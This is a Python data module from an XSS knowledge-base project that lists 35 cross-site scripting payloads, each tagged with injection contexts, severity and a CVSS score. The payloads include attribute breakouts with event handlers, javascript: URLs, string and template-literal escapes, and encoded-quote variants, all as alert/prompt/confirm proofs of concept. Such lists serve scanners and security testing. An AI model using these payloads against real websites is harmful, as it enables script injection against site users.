#!/usr/bin/env python3
"""
Project: BRS-KB (BRS XSS Knowledge Base)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-12-27 UTC
Status: Refactored
Telegram: https://t.me/EasyProTech

Context Specific Core Payloads - Part 1
"""

from typing import Dict

from ..models import PayloadEntry


CONTEXT_SPECIFIC_CORE_PAYLOADS_PART1: Dict[str, PayloadEntry] = {
    "context_specific_001": PayloadEntry(
        payload='" onmouseover="alert(1)" "',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_002": PayloadEntry(
        payload="' onmouseover='alert(1)' '",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_003": PayloadEntry(
        payload='" onfocus="alert(1)" autofocus="',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_004": PayloadEntry(
        payload="' onfocus='alert(1)' autofocus='",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_005": PayloadEntry(
        payload='" onclick="alert(1)" "',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_006": PayloadEntry(
        payload="' onclick='alert(1)' '",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_007": PayloadEntry(
        payload=" onfocus=alert(1) autofocus ",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_008": PayloadEntry(
        payload="\" onmouseover='alert(1)' \"",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_009": PayloadEntry(
        payload="' onmouseover=\"alert(1)\" '",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_010": PayloadEntry(
        payload="` onmouseover=alert(1) `",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_011": PayloadEntry(
        payload="javascript:alert(String.fromCharCode(88,83,83))",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_012": PayloadEntry(
        payload='javascript:eval("alert(1)")',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_013": PayloadEntry(
        payload="`;alert(1);//",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_014": PayloadEntry(
        payload="';alert(1);/*",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_015": PayloadEntry(
        payload='";alert(1);/*',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_016": PayloadEntry(
        payload="`;alert(1);/*",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_017": PayloadEntry(
        payload="'+alert(1)+'",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_018": PayloadEntry(
        payload='"+alert(1)+"',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_019": PayloadEntry(
        payload="`+alert(1)+`",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_020": PayloadEntry(
        payload="'+alert(String.fromCharCode(88,83,83))+'",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_021": PayloadEntry(
        payload="${alert(1)}",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_022": PayloadEntry(
        payload="${alert(String.fromCharCode(88,83,83))}",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_023": PayloadEntry(
        payload='${eval("alert(1)")}',
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_024": PayloadEntry(
        payload="${prompt(1)}",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_025": PayloadEntry(
        payload="${confirm(1)}",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_026": PayloadEntry(
        payload="\\u0027;alert(1);//",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_027": PayloadEntry(
        payload="\\x27;alert(1);//",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_028": PayloadEntry(
        payload="\\047;alert(1);//",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_029": PayloadEntry(
        payload="\\';alert(1);//",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_030": PayloadEntry(
        payload="\n';alert(1);//",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_031": PayloadEntry(
        payload="\r';alert(1);//",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_032": PayloadEntry(
        payload="\r\n';alert(1);//",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_033": PayloadEntry(
        payload="alert(1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_034": PayloadEntry(
        payload="prompt(1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
    "context_specific_035": PayloadEntry(
        payload="confirm(1)",
        contexts=["html_attribute", "js_string", "css", "url"],
        severity="medium",
        cvss_score=5.5,
        description="Context Specific payload",
        tags=["context-specific"],
        waf_evasion=False,
    ),
}
